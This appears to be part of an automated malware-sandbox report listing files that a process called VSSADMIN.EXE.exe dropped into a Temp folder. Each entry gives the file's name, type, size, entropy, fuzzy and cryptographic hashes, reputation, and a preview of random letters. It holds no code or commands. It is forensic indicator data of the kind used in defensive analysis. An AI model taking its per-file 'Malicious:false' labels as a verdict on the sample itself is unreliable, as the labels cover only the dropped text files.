                                                                                                                                                                    Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Downloads\HTAGVDFUIE.mp3

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.692693183518806
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                    MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                    SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                    SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                    SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Downloads\HTAGVDFUIE.pdf

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.692693183518806
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                    MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                    SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                    SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                    SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Downloads\KATAXZVCPS.png

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699548026888946
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                    MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                    SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                    SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                    SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Downloads\KZWFNRXYKI.mp3

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.694982189683734
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                    MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                    SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                    SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                    SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Downloads\LTKMYBSEYZ.jpg

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.687722658485212
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                    MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                    SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                    SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                    SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Downloads\ONBQCLYSPU.docx

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699434772658264
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                    MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                    SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                    SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                    SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Downloads\ONBQCLYSPU.xlsx

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699434772658264
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                    MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                    SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                    SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                    SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Downloads\UMMBDNEQBN.jpg

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.695685570184741
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                    MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                    SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                    SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                    SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Downloads\UMMBDNEQBN.xlsx

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.695685570184741
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                    MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                    SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                    SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                    SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
